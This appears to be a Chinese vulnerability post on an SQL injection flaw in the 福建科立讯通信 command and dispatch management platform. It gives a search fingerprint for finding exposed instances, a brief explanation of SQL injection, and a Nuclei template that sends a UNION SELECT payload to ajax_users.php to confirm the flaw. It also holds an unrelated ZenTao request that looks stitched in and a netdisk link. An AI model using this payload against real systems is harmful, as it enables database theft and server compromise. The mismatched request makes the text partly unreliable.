指挥调度管理平台

body="指挥调度管理平台"

GET /zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=dddidkyodsnfamzvjidb&branch=klmnehgxnsmeuhshbooy HTTP/1.1Host: 127.0.0.1Content-Length: 0

SQL注入是一种常见的网络应用程序漏洞，攻击者通过利用该漏洞可以执行未经授权的数据库操作。SQL注入漏洞的原理是在应用程序中未对用户输入进行充分验证和过滤，导致恶意用户能够将恶意的SQL代码注入到应用程序的数据库查询语句中，从而实现执行额外的SQL语句。

id: Fujian-Collexion-communication-command-and-dispatch-management-platform-ajax-users-php-SQL-injection-vulnerability

info:
  name: 福建科立讯通信 指挥调度管理平台 ajax_users.php SQL注入漏洞
  author: Adler
  severity: critical
  description: |
    - 福建科立讯通信的指挥调度管理平台是一种用于管理和协调各种通信设备和资源的系统。该平台旨在帮助企业有效地监控、调度和管理通信设备、人员和任务，以提高工作效率和服务质量​。​
    该产品 ajax_users.php接口处存在SQL注入漏洞，攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
http:
  - raw:
      - |
        POST /app/ext/ajax_users.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
        Content-Type: application/x-www-form-urlencoded
        
        dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "usr_number"
      - type: status
        status:
          - 200

链接：https://pan.baidu.com/s/1voWRnYlUqPXcwmPOsI-XwQ 提取码：u7v3